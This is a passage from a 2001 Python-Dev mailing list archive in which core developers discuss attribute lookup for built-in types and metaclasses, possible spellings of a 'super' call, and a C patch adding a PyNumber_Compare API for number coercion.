<200105020155.UAA25687@cj20424-a.reston1.va.home.com> > Would it make sense to a explicitly raise a more meaningful exception here > if __all__ doesnt contain strings? Definitely. Be my guest. --Guido van Rossum (home page: http://www.python.org/~guido/) From greg at cosc.canterbury.ac.nz Wed May 2 03:22:47 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Wed, 02 May 2001 13:22:47 +1200 (NZST) Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: <200105020052.TAA24315@cj20424-a.reston1.va.home.com> Message-ID: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> Guido: > If both are defined, I propose the following, clumsy but backwards > compatible rule: if DictType.__dict__['foo'] describes a method, it > wins. Otherwise, TypeType.__dict__['foo'] wins. Yeek! I think that's far too confusing a rule. I suppose it might do in the meantime, but we'd better have a long term solution in mind before going too far down this route. Ultimately it seems like we'll have to introduce a separate namespace for methods and default instance attributes, say __classdict__. Then lookup of x.foo would look first in x.__dict__, then x.__class__.__classdict__, etc up the inheritance chain. Then we'll have to resolve the ambiguity of the class.foo syntax. The bravest way would be simply to change the syntax for getting unbound methods. The most common use for these seems to be for calling inherited methods, so perhaps something like inherited MyBaseClass.foo(arg, ...) which would be equivalent to getmethod(MyBaseClass, 'foo')(self, arg, ...) where getmethod() is a new builtin like getattr() except that it looks in the __classdict__, and 'self' is really whatever the first argument of the containing method was. Now that we have __future__, would such a change be contemplatable? Or is it too radical to even think about? Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From guido at digicool.com Wed May 2 04:48:43 2001 From: guido at digicool.com (Guido van Rossum) Date: Tue, 01 May 2001 21:48:43 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Wed, 02 May 2001 13:22:47 +1200." <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> Message-ID: <200105020248.VAA30315@cj20424-a.reston1.va.home.com> > Guido: > > > If both are defined, I propose the following, clumsy but backwards > > compatible rule: if DictType.__dict__['foo'] describes a method, it > > wins. Otherwise, TypeType.__dict__['foo'] wins. Greg Ewing: > Yeek! I think that's far too confusing a rule. I suppose > it might do in the meantime, but we'd better have a long > term solution in mind before going too far down this > route. I agree 100%. I had to do something quick to be able to make progress with my PEP 252 project, but it's a clear indication that there's a problem! > Ultimately it seems like we'll have to introduce a separate > namespace for methods and default instance attributes, > say __classdict__. Then lookup of x.foo would look > first in x.__dict__, then x.__class__.__classdict__, > etc up the inheritance chain. Except that sometimes you really do want x.__class__.__classdict__ to have priority (e.g. for "guarded" attributes). > Then we'll have to resolve the ambiguity of the class.foo > syntax. The bravest way would be simply to change the syntax > for getting unbound methods. Agreed again. > The most common use for these seems to be for calling > inherited methods, so perhaps something like > > inherited MyBaseClass.foo(arg, ...) > > which would be equivalent to > > getmethod(MyBaseClass, 'foo')(self, arg, ...) > > where getmethod() is a new builtin like getattr() > except that it looks in the __classdict__, and 'self' > is really whatever the first argument of the containing > method was. The second most common use is to reference class variables (e.g. imagine a class that keeps counters of how many instances have been created and deleted in C.initcount and C.delcount). But these should not have to change, since they really are class attributes. > Now that we have __future__, would such a change be contemplatable? > Or is it too radical to even think about? If we can find a way to spell "super.method", we should be ready for the future. I can't think of something right off the bat unfortunately. But the issue of backwards compatibility is a big one here: the idioms for calling base class methods and using class variables as defaults for instance variables are so common that we will have to support these for many future versions! (Two things I am not looking forward to: fixing all the Zope code that uses this, and telling the author of Programming Python, 2nd. ed.) --Guido van Rossum (home page: http://www.python.org/~guido/) From greg at cosc.canterbury.ac.nz Wed May 2 04:48:20 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Wed, 02 May 2001 14:48:20 +1200 (NZST) Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: <200105020248.VAA30315@cj20424-a.reston1.va.home.com> Message-ID: <200105020248.OAA16329@s454.cosc.canterbury.ac.nz> Guido: > Except that sometimes you really do want x.__class__.__classdict__ to > have priority (e.g. for "guarded" attributes). What's a "guarded" attribute? > But the issue of backwards compatibility is a big one here I was thinking that, while this is still in the __future__, the __dict__ attribute would be a pseudo-dict that, by default, behaves like the union of the old __dict__ and the __classdict__. Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From mal at lemburg.com Wed May 2 09:59:03 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Wed, 02 May 2001 09:59:03 +0200 Subject: [Python-Dev] Coercion and comparison of numbers References: <3AEF2903.79308F55@lemburg.com> <200105020129.UAA24690@cj20424-a.reston1.va.home.com> <20010501174215.A9565@glacier.fnational.com> Message-ID: <3AEFBE47.A847C5D2@lemburg.com> Neil Schemenauer wrote: > > [MAL] > > I just received a bug report for mx.Number which revealed a > > probelm with the comparison code in Python 2.1. Looking at > > the code it seems that one of my original coercion patches > > did not make it into the core. I added a new API PyNumber_Compare() > > knows about the new coercion mechanism and should be called for > > numbers instead of trying coercion in PyObject_Compare(). > > I remember the API. I don't remember what happened to it. Guido > might have dropped it or I might have taken it out thinking the > comparison issues would be sorted out by Guido. Good; so there's a chance for getting it back in :-) > Why is a new API needed? Why can't PyObject_Compare() do the > right thing (ie. not coerce new style numbers)? I think the reason for implementing number compares as separate API was to simply shift out code from PyObject_Compare() into a new function, not so much motivated by some higher level need to do number compares. [Guido] > > Was this part of the coercion patch left out on purpose or > > a simple oversight ? I hope the latter... > > Hard to say. I don't think I paid very close attention to your patch; > Neil did, but I changed a lot of the code around coercions and > comparisons in order to implement rich comparisons. So, several > things may have happened: Neil lost it; Neil decided against it; or I > ripped it out. > > Can you elucidate me regarding the issues? (If there's code, please > quote it or link to a specific patch.) Since the concept of "number" > is ill-defined at best, when exactly should PyNumber_Compare() be > called? What is it supposed to do? Does it need a rich cousin? The reasoning is simple: the coercion patches basically pass control over coercion down to the APIs in question and thus provide the type with more information to choose from. This is currently implemented in 2.1 for all number methods, but not for number comparisons which do have the same problems with centralized coercion as e.g. __add__ or other binary operators. Here's part of the original patch: --- Include/orig/abstract.h Wed May 13 00:28:58 1998 +++ Include/abstract.h Thu May 21 12:31:55 1998 @@ -447,11 +447,18 @@ xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx This function always succeeds. */ - PyObject *PyNumber_Add Py_PROTO((PyObject *o1, PyObject *o2)); + PyObject *PyNumber_Compare Py_PROTO((PyObject *o1, PyObject *o2)); + + /* + Returns the result of comparing o1 and o2, or null on failure. + This is the equivalent of the Python expression: cmp(o1,o2). + */ + + PyObject *PyNumber_Add Py_PROTO((PyObject *o1, PyObject *o2)); /* Returns the result of adding o1 and o2, or null on failure. This is the equivalent of the Python expression: o1+o2. [...] } +/* Emulate old method for comparing numeric types using coercion and + tp_compare. If coercion doesn't work, we use the type names as + comparison basis (like PyObject_Compare() does too). */ + +static PyObject * +_PyNumber_OldstyleCompare(PyObject *v, + PyObject *w) +{ + int err; + + DPRINTF("_PyNumber_OldstyleCompare(%s at 0x%lx, %s at 0x%lx);\n", + v->ob_type->tp_name,(long)v, + w->ob_type->tp_name,(long)w); + err = PyNumber_CoerceEx(&v, &w); + if (err < 0) + return NULL; + else if (err == 0 && v->ob_type->tp_compare) { + int cmp; + + cmp = (*v->ob_type->tp_compare)(v, w); + /* XXX Test for errors ? Looks like C types cannot raise + exceptions in the compare slot... */ + Py_DECREF(v); + Py_DECREF(w); + DPRINTF(" compare slot returned: %i",cmp); + return PyInt_FromLong(cmp); + } + DPRINTF(" using type names for comparison\n"); + return PyInt_FromLong(strcmp(v->ob_type->tp_name, + w->ob_type->tp_name)); +} + +PyObject * +PyNumber_Compare(v, w) + PyObject *v, *w; +{ + DPRINTF("PyNumber_Compare(%s at 0x%lx, %s at 0x%lx);\n", + v->ob_type->tp_name,(long)v, + w->ob_type->tp_name,(long)w); + BINOP("__cmp__", "__rcmp__", PyNumber_Compare); + return _PyNumber_BinaryOperation(v,w, + NB_SLOT(nb_cmp), + "cmp()"); +} + [...] +static PyObject * +_PyNumber_BinaryOperation(PyObject *v, + PyObject *w, + const int op_slot, + const char *operation) +{ + PyNumberMethods *mv, *mw; + register PyObject *x; + register binaryfunc *slot; + int c; ... + /* When using old coercion, make sure that the requested slot + is available on old style numbers or use an emulation. */ + if (op_slot > NB_SLOT(nb_hex)) { + + /* Emulation hooks: */ + if (op_slot == NB_SLOT(nb_cmp)) + return _PyNumber_OldstyleCompare(v,w); + + goto badOperands; + } [...] int PyObject_Compare(v, w) PyObject *v, *w; { PyTypeObject *tp; @@ -291,27 +294,30 @@ PyObject_Compare(v, w) Py_DECREF(res); PyErr_SetString(PyExc_TypeError, "comparison did not return an int"); return -1; } - c = PyInt_AsLong(res); + c = PyInt_AS_LONG(res); Py_DECREF(res); return (c < 0) ? -1 : (c > 0) ? 1 : 0; } if ((tp = v->ob_type) != w->ob_type) { - if (tp->tp_as_number != NULL && - w->ob_type->tp_as_number != NULL) { - int err; - err = PyNumber_CoerceEx(&v, &w); - if (err < 0) + if (tp->tp_as_number != NULL || + w->ob_type->tp_as_number != NULL) { + PyObject *res; + int c; + res = PyNumber_Compare(v,w); + if (res == NULL) return -1; - else if (err == 0) { - int cmp = (*v->ob_type->tp_compare)(v, w); - Py_DECREF(v); - Py_DECREF(w); - return cmp; + if (!PyInt_Check(res)) { + PyErr_SetString(PyExc_TypeError, + "comparison did not return an int"); + return -1; } + c = PyInt_AS_LONG(res); + Py_DECREF(res); + return (c < 0) ? -1 : (c > 0) ? 1 : 0; } return strcmp(tp->tp_name, w->ob_type->tp_name); } if (tp->tp_compare == NULL) return (v < w) ? -1 : 1; -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal at lemburg.com Wed May 2 11:09:17 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Wed, 02 May 2001 11:09:17 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020052.TAA24315@cj20424-a.reston1.va.home.com> Message-ID: <3AEFCEBD.2E5979C9@lemburg.com> Guido van Rossum wrote: > > While implementing more class-like behavior for built-in types in the > experimental descr-branch in the 2.2 CVS tree, I've noticed problems > caused by Python's collapsing of class attributes and instance > attributes. > > For example, suppose d is a dictionary. My experimental changes make > d.__class__ return DictType (from the types module). > (DictType.__class__ is TypeType, by the way.) I also added special > methods. For example, d.__repr__() now returns repr(d). I am > preparing for subclassing of built-in types, so I will eventually be > able to derive a class MyDictType from DictType, as follows: > > class MyDictType(DictType): > ... > > Now comes the fun part. Suppose MyDictType wants to define its own > repr(): > > class MyDictType(DictType): > def __repr__(self): > return "MyDictType(%s)" % DictType.__repr__(self) > > But, (surprise, surprise!), DictType itself also has a __repr__() > method: it returns the string "". > > So the above code would fail: DictType.__repr__() returns > repr(DictType), and DictType.__repr__(self) raises an argument count > error. The correct __repr__ method for dictionary objects can be > found as DictType.__dict__['__repr__'], but that looks hideous! > > What to do? Pragmatically, I can make DictType.__repr__ return > DictType.__dict__['__repr__'], and all will be well in this example. > But we have to tread carefully here: DictType.__class__ is TypeType, > but DictType.__dict__['__class__'] is a descriptor for the __class__ > attribute on dictionary objects. > > The best rule I can think of so far is that DictType.__dict__ gives > the *true* set of attribute descriptors for dictionary objects, and is > thus similar to Smalltalks's class.methodDict that Jim describes > below. DictType.foo is a shortcut that can resolve to either > DictType.__dict__['foo'] or to an attribute (maybe a method) of > DictType described in TypeType.__dict__['foo'], whichever is defined. > If both are defined, I propose the following, clumsy but backwards > compatible rule: if DictType.__dict__['foo'] describes a method, it > wins. Otherwise, TypeType.__dict__['foo'] wins. I'm not sure I can follow you here: DictType.__repr__ is the representation method of the dictionary and not inherited from TypeType, so there should be no problem. The problem with the misleading error message would only show up in case DictType does not define a __repr__ method. Then the inherited one from TypeType would come into play and cause the problem you mention above. Thinking in terms of meta-classes, I believe we should implement this mechanism in the meta-class (TypeType in this case). Its __getattr__() will have to decide whether or not to expose its own methods and attributes or not. The only catch here is that currently instances and classes have control of whether and how to bind found functions as methods or not. We should probably change that to pass complete control over to the meta-class object and remove the special control flows currently found in instance_getattr2() and class_lookup(). In general, I think that meta-classes should not expose their attributes to the class objects they create, since this causes way to many problems. Perhaps I'm oversimplifying things here, but I have a feeling that we can go a long way by actually trying to see meta-classes as first class members in the interpreter design and moving all the binding and lookup mechanisms over to this object type. The special casing should then take place in the meta-class rather than its creations. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From thomas.heller at ion-tof.com Wed May 2 12:57:42 2001 From: thomas.heller at ion-tof.com (Thomas Heller) Date: Wed, 2 May 2001 12:57:42 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> Message-ID: <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> > > The most common use for these seems to be for calling > > inherited methods, so perhaps something like > > > > inherited MyBaseClass.foo(arg, ...) > > > > which would be equivalent to > > > > getmethod(MyBaseClass, 'foo')(self, arg, ...) > > > > where getmethod() is a new builtin like getattr() > > except that it looks in the __classdict__, and 'self' > > is really whatever the first argument of the containing > > method was. > > The second most common use is to reference class variables > (e.g. imagine a class that keeps counters of how many instances have > been created and deleted in C.initcount and C.delcount). But these > should not have to change, since they really are class attributes. > > > Now that we have __future__, would such a change be contemplatable? > > Or is it too radical to even think about? > > If we can find a way to spell "super.method", we should be ready for > the future. I can't think of something right off the bat > unfortunately. Could we make super(self, MyBaseClass).foo(arg, ...) behave similar to MyBaseClass.foo(self, arg, ...) Wrapping this stuff in a function would probably also enable to use the same pattern in existing python versions. Thomas From thomas.heller at ion-tof.com Wed May 2 13:12:21 2001 From: thomas.heller at ion-tof.com (Thomas Heller) Date: Wed, 2 May 2001 13:12:21 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020052.TAA24315@cj20424-a.reston1.va.home.com> Message-ID: <03d301c0d2f8$c29d3960$e000a8c0@thomasnotebook> > Jim Althoff (a big commercial user of J[P]ython) sent me a summary of > how metaclasses work in Smalltalk. He should know, since he invented > them! :-) I include it below, with his permission. I found this very interesting reading. [From Jim Althoff] > In the list below, indentation indicates class hieararchy (superclass -- > subclass) The indentation, unfortunately, seems to be destroyed. > > plain-class > ---------------- > > o Class > o Object isInstanceOf > o ObjectMetaClass isInstanceOf MetaClass > o Class isInstanceOf > o ClassMetaClass isInstanceOf MetaClass > o MetaClass isInstanceOf > o MetaClassMetaClass isInstanceOf MetaClass > . . . > o Rectangle isInstanceOf > o RectangleMetaClass isInstanceOf MetaClass > o SpecializedRectangle isInstanceOf > o SpecializedRectangleMetaClass isInstanceOf MetaClass A question for Jim (this is more Smalltalk than Python related): How does the Behaviour class fit into this picture? Thhomas From guido at digicool.com Wed May 2 14:15:57 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 07:15:57 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Wed, 02 May 2001 12:57:42 +0200." <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> Message-ID: <200105021215.HAA31939@cj20424-a.reston1.va.home.com> > > If we can find a way to spell "super.method", we should be ready for > > the future. I can't think of something right off the bat > > unfortunately. > > Could we make > > super(self, MyBaseClass).foo(arg, ...) > > behave similar to > > MyBaseClass.foo(self, arg, ...) > > Wrapping this stuff in a function would probably also > enable to use the same pattern in existing python versions. Yes, I can see how to write super() using current tools (or 1.5.2 even). The problem is that this makes super calls even more wordy than they already are! I can't think of anything that wouldn't require compiler support though. --Guido van Rossum (home page: http://www.python.org/~guido/) From gward at python.net Wed May 2 14:57:41 2001 From: gward at python.net (Greg Ward) Date: Wed, 2 May 2001 08:57:41 -0400 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: <200105021215.HAA31939@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Wed, May 02, 2001 at 07:15:57AM -0500 References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> Message-ID: <20010502085741.B515@gerg.ca> On 02 May 2001, Guido van Rossum said: > Yes, I can see how to write super() using current tools (or 1.5.2 > even). The problem is that this makes super calls even more wordy > than they already are! I can't think of anything that wouldn't > require compiler support though. I was just doing some gedanken with various ways to spell "super", and I think my favourite is the same as Java's (as I remember it): class MyClass (BaseClass): def foo (self, arg1, arg2): super.foo(arg1, arg2) Since I don't know much about Python's guts, I can't say how implementable this is, but I like the spelling. The semantics would be something like this (with adjustments to the reality of Python's guts): * 'super' is a magic object that only makes sense inside a 'def' inside a 'class' (at least for now; perhaps it could be generalized to work at class scope as well as method scope, but let's keep it simple) * super's notional __getattr__() does something like this: - peek at the calling stack frame and fetch the calling function (MyClass.foo) and the first argument to that function (self) - [is this possible?] ensure that calling_function is a bound method, and that it's bound to the self object we just plucked from the stack; raise a "misuse of super object" exception if not - walk the superclass tree starting at self.__class__.__bases__ (ie. skip self's class), looking for an object with the name passed to this __getattr__() call -- 'foo' - when found, return it - if not found, raise AttributeError The ability to peek at the calling stack frame is essential to this scheme, in order to fetch the "current object" (self) without needing to have it explicitly passed. Is this as bothersome from C as it is from Python? Greg -- Greg Ward - nerd gward at python.net http://starship.python.net/~gward/ In space, no one can hear you fart. From mal at lemburg.com Wed May 2 15:07:27 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Wed, 02 May 2001 15:07:27 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> Message-ID: <3AF0068F.32388C87@lemburg.com> Greg Ward wrote: > > On 02 May 2001, Guido van Rossum said: > > Yes, I can see how to write super() using current tools (or 1.5.2 > > even). The problem is that this makes super calls even more wordy > > than they already are! I can't think of anything that wouldn't > > require compiler support though. > > I was just doing some gedanken with various ways to spell "super", and I > think my favourite is the same as Java's (as I remember it): > > class MyClass (BaseClass): > def foo (self, arg1, arg2): > super.foo(arg1, arg2) > > Since I don't know much about Python's guts, I can't say how > implementable this is, but I like the spelling. The semantics would be > something like this (with adjustments to the reality of Python's guts): > ... This doesn't work in Python since Python has multiple inheritence, e.g. super in class A(B,C): def foo(self): super.foo() is ambiguous. I'd rather suggest adding a function for finding the basemethod of a method. This is probably the most common task in this context. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From thomas.heller at ion-tof.com Wed May 2 15:12:40 2001 From: thomas.heller at ion-tof.com (Thomas Heller) Date: Wed, 2 May 2001 15:12:40 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> Message-ID: <049901c0d309$92c515d0$e000a8c0@thomasnotebook> [Greg Ward] > On 02 May 2001, Guido van Rossum said: > > Yes, I can see how to write super() using current tools (or 1.5.2 > > even). The problem is that this makes super calls even more wordy > > than they already are! I can't think of anything that wouldn't > > require compiler support though. > > I was just doing some gedanken with various ways to spell "super", and I > think my favourite is the same as Java's (as I remember it): > > class MyClass (BaseClass): > def foo (self, arg1, arg2): > super.foo(arg1, arg2) > > > Since I don't know much about Python's guts, I can't say how > implementable this is, but I like the spelling. The semantics would be > something like this (with adjustments to the reality of Python's guts): > > * 'super' is a magic object that only makes sense inside a 'def' > inside a 'class' (at least for now; perhaps it could be generalized > to work at class scope as well as method scope, but let's keep > it simple) > > * super's notional __getattr__() does something like this: > - peek at the calling stack frame and fetch the calling function > (MyClass.foo) and the first argument to that function (self) > - [is this possible?] ensure that calling_function is a bound > method, and that it's bound to the self object we just plucked > from the stack; raise a "misuse of super object" exception if not > - walk the superclass tree starting at self.__class__.__bases__ Caareful! The search in the above context must start at MyClass.__bases__ which may not be the same as self.__class__.__bases__. Thomas From guido at digicool.com Wed May 2 16:29:03 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 09:29:03 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Wed, 02 May 2001 08:57:41 -0400." <20010502085741.B515@gerg.ca> References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> Message-ID: <200105021429.JAA32055@cj20424-a.reston1.va.home.com> [Greg Ward, welcome back!] > I was just doing some gedanken with various ways to spell "super", and I > think my favourite is the same as Java's (as I remember it): > > class MyClass (BaseClass): > def foo (self, arg1, arg2): > super.foo(arg1, arg2) I'm sure that's everybody's favorite way to spell it! It's mine too. :-) > Since I don't know much about Python's guts, I can't say how > implementable this is, but I like the spelling. The semantics would be > something like this (with adjustments to the reality of Python's guts): > > * 'super' is a magic object that only makes sense inside a 'def' > inside a 'class' (at least for now; perhaps it could be generalized > to work at class scope as well as method scope, but let's keep > it simple) Yes, that's about the only way it can be made to work. The compiler will have to (1) detect that 'super' is a free variable, and (2) make it a local and initialize it with the proper magic. Or, to relieve the burden from the symbol table, we could make super a keyword, at the cost of breaking existing code. I don't think super is needed outside methods. > * super's notional __getattr__() does something like this: > - peek at the calling stack frame and fetch the calling function > (MyClass.foo) and the first argument to that function (self) > - [is this possible?] ensure that calling_function is a bound > method, and that it's bound to the self object we just plucked > from the stack; raise a "misuse of super object" exception if not I don't think you can make that test, but making it a 'magic local' as I suggested above would avoid the problem. > - walk the superclass tree starting at self.__class__.__bases__ > (ie. skip self's class), looking for an object with the name > passed to this __getattr__() call -- 'foo' > - when found, return it > - if not found, raise AttributeError Yup, that's the easy part. :-) > The ability to peek at the calling stack frame is essential to this > scheme, in order to fetch the "current object" (self) without needing to > have it explicitly passed. Is this as bothersome from C as it is from > Python? No, in C it's easy. The problem is that there is no information in the frame that tells you where the currently executing function was defined -- all you have is the code object, which is context-independent. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Wed May 2 16:30:20 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 09:30:20 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Wed, 02 May 2001 15:07:27 +0200." <3AF0068F.32388C87@lemburg.com> References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <3AF0068F.32388C87@lemburg.com> Message-ID: <200105021430.JAA32075@cj20424-a.reston1.va.home.com> > This doesn't work in Python since Python has multiple inheritence, > e.g. super in > > class A(B,C): > def foo(self): > super.foo() > > is ambiguous. I'm not sure what you mean. The search is totally well-defined: first search B for a foo method, then search C. > I'd rather suggest adding a function for finding the basemethod > of a method. This is probably the most common task in this context. I've never heard of the concept of basemethod, but if I may venture a guess, it would be the same definition as I give above. --Guido van Rossum (home page: http://www.python.org/~guido/) From jeremy at digicool.com Wed May 2 15:38:42 2001 From: jeremy at digicool.com (Jeremy Hylton) Date: Wed, 2 May 2001 09:38:42 -0400 (EDT) Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: <200105021429.JAA32055@cj20424-a.reston1.va.home.com> References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> Message-ID: <15088.3554.953359.757584@slothrop.digicool.com> >>>>> "GvR" == Guido van Rossum writes: >> Since I don't know much about Python's guts, I can't say how >> implementable this is, but I like the spelling. The semantics >> would be something like this (with adjustments to the reality of >> Python's guts): >> >> * 'super' is a magic object that only makes sense inside a 'def' >> inside a 'class' (at least for now; perhaps it could be >> generalized to work at class scope as well as method scope, but >> let's keep it simple) GvR> Yes, that's about the only way it can be made to work. The GvR> compiler will have to (1) detect that 'super' is a free GvR> variable, and (2) make it a local and initialize it with the GvR> proper magic. Or, to relieve the burden from the symbol table, GvR> we could make super a keyword, at the cost of breaking existing GvR> code. GvR> I don't think super is needed outside methods. It seems helpful to clarify here, since this came up in conversation at PythonLabs just the other day with the yield statement. If we try to avoid keywords, we have to take the "well, I don't see anyone assigning to this name" route. If the compiler does not detect any assignment to a nearly reserved word, like super, it would give the use of that word special meaning. There are a bunch of little problems. A module could (not necessarily should) be designed to have a global name poked into its namespace; this would break, because the name would already have transmogrified from a regular variable into a special one. The use of exec or import star would make it impossible for the word to take on its special meaning. So keywords really are a lot clearer, but they have the potential to be incompatible. Jeremy From fredrik at pythonware.com Wed May 2 16:00:55 2001 From: fredrik at pythonware.com (Fredrik Lundh) Date: Wed, 2 May 2001 16:00:55 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> Message-ID: <000d01c0d310$4ee127d0$0900a8c0@spiff> guido wrote: > > class MyClass (BaseClass): > > def foo (self, arg1, arg2): > > super.foo(arg1, arg2) > > I'm sure that's everybody's favorite way to spell it! not mine. my brain contains far too much Python 1.5.2 code for it to accept that some variables are dynamically scoped, while others are lexically scoped. why not spell it out: self.__super__.foo(arg1, arg2) or self.super.foo(arg1, arg2) or super(self).foo(arg1, arg2) > Or, to relieve the burden from the symbol table, we could make super > a keyword, at the cost of breaking existing code. hey, how about introducing $ as a keyword prefix for newly introduced keywords? $super.foo(arg1, arg2) (this can of course be mapped to either of my previous suggestions; "$foo" either means "self.foo" or "foo(self)"...) and to save a little typing, only use it for keywords that start with an "s" (should leave us plenty of expansion room): $uper.foo(arg1, arg2) otoh, if "super" is common enough to motivate introducing magic objects into python, maybe "$" should mean "super."? $foo(arg1, arg2) and while we're at it, let's introduce "@" for "self.". gotta run -- time for my monthly reboot /F From guido at digicool.com Wed May 2 17:03:37 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 10:03:37 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Wed, 02 May 2001 11:09:17 +0200." <3AEFCEBD.2E5979C9@lemburg.com> References: <200105020052.TAA24315@cj20424-a.reston1.va.home.com> <3AEFCEBD.2E5979C9@lemburg.com> Message-ID: <200105021503.KAA32203@cj20424-a.reston1.va.home.com> [me] > > The best rule I can think of so far is that DictType.__dict__ gives > > the *true* set of attribute descriptors for dictionary objects, and is > > thus similar to Smalltalks's class.methodDict that Jim describes > > below. DictType.foo is a shortcut that can resolve to either > > DictType.__dict__['foo'] or to an attribute (maybe a method) of > > DictType described in TypeType.__dict__['foo'], whichever is defined. > > If both are defined, I propose the following, clumsy but backwards > > compatible rule: if DictType.__dict__['foo'] describes a method, it > > wins. Otherwise, TypeType.__dict__['foo'] wins. [MAL] > I'm not sure I can follow you here: DictType.__repr__ is the > representation method of the dictionary and not inherited > from TypeType, so there should be no problem. The problem is that both a dictionary object (call it d) and its type (DictType) have a __repr__ method: repr(d) returns "d", and repr(DictType) returns "". Given the analogy with classes, where str(x) invokes x.__str__() and x.__str__() can also be called directly, it is not unreasonable to expect that this works in general, so that repr(d) can be spelled as d.__repr__() and repr(DictType) as DictType.__repr__() And, given another analogy with classes, where x.foo() is equivalent to x.__class__.foo(x), the two forms above should also be equivalent to d.__class__.__repr__(d) and DictType.__class__.__repr__(DictType) But since d.__class__ is DictType, we now have two conflicting ways to derive a meaning for DictType.__repr__: the first one going repr(DictType) => DictType.__repr__() and the second one going repr(d) => d.__class__.__repr__(d) => DictType.__repr__(d) The rule quoted above chooses the second meaning, from the very pragmatic point that once I allow subclassing from DictType, such a subclass might very well want to override __repr__ to wrap the base class __repr__, and the conventional way to reference that (barring the implementation of 'super') is DictType.__repr__. Direct invocation of an object's own __repr__ method as x.__repr__() is much les common. The implementation of repr(x) can do the right thing, which is to look for x.__class__.__dict__['__repr__']. > The problem with the misleading error message would only show > up in case DictType does not define a __repr__ method. Then the > inherited one from TypeType would come into play and cause > the problem you mention above. No, the issue is not inheritance: I haven't implemented inheritance yet. DictType is an instance of TypeType but doesn't inherit from it. > Thinking in terms of meta-classes, I believe we 